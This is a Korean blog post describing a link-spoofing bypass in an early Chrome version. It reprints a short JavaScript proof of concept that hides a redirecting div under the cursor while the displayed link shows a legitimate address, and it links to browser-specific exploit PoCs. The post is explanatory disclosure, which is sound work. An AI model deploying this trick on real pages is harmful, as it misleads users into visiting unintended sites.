크롬에서 링크변조(Clickjacking) 취약점 발견

출처: Darknet

링크변조 기술이 널리 사용됨에 따라 크롬에서는 링크에 마우스를 올려놓으면 해당 링크가 실제로 어떤 사이트를 Target으로 하고 있는지를 보여주고 있습니다. 그런데 CNN에 간단하게 이 기술을 위회할 수 있는 내용이 소개되었네요. 실제로 해보니까 잘 되는군요.

다음은 제가 크롬 최신 버전인 1.0.154.43에서 실제로 돌려본 내용입니다.

이 동영상의 내용은 POC(Proof of Concept)에서 확인이 가능합니다.

핵심이 되는 소스 코드만 추출해서 살펴보면,

우선 A 태그를 사용하여 링크를 걸어줍니다. 이때 크롬의 링크 주소 보여주는 기능을 우회하기 위해 일단은 href에 정상적인 링크를 걸어주고 실제 작업은 onclick 이벤트에서 처리되도록 합니다.

<a href="http://www.yahoo.com" onclick="clickjack_armor(evt)">Clickjack The Target (http://www.yahoo.com) : (http://www.xssed.com)</a><br />

clickjack_armor 함수는 다음과 같이 자바스크립트 코드로 작성되어 있습니다.

<div id="mydiv" onmouseover="document.location='http://www.xssed.com';" style="position:absolute;width:2px;height:2px;background:#000000;border:0px"> </div> <script> function clickjack_armor(evt) { clickjack_mouseX=evt.pageX?evt.pageX:evt.clientX; clickjack_mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('mydiv').style.left=clickjack_mouseX-1; document.getElementById('mydiv').style.top=clickjack_mouseY-1; } </script>

보시면 아시겠지만 clickjack_armor 함수는 마우스의 좌표를 계산해서 강제로 숨겨져 있는 링크의 이벤트(onmouseover)가 실행되도록 하고 있습니다. 원리도 간단하고 방식도 비교적 쉬운데 사실 브라우저 입장에서 이 문제를 처리하기는 굉장히 까다로울것 같네요. 그렇다고 자바스크립트를 모두다 막을 수도 없는 노릇이구요. 하긴 파폭에서 작동하는 것처럼 href 속성이 설정되어 있으면 onclick 이벤트를 무시하도록 처리하면 되겠네요.

어쨌든 아직까지 크롬은 이와 관련된 버그 패치를 출시하지 않았고 IE에는 여전히 문제가 있었으니 더 언급할 필요도 없네요. 여러분이나 저나 모두 조심해야 겠습니다.

#업데이트

웹 브라우저 버전별로 POC 코드가 있네요.

http://milw0rm.com/exploits/7912 - IE 7
http://milw0rm.com/exploits/7903 - Chrome 1.0
http://milw0rm.com/exploits/7842 - FF 3.0.5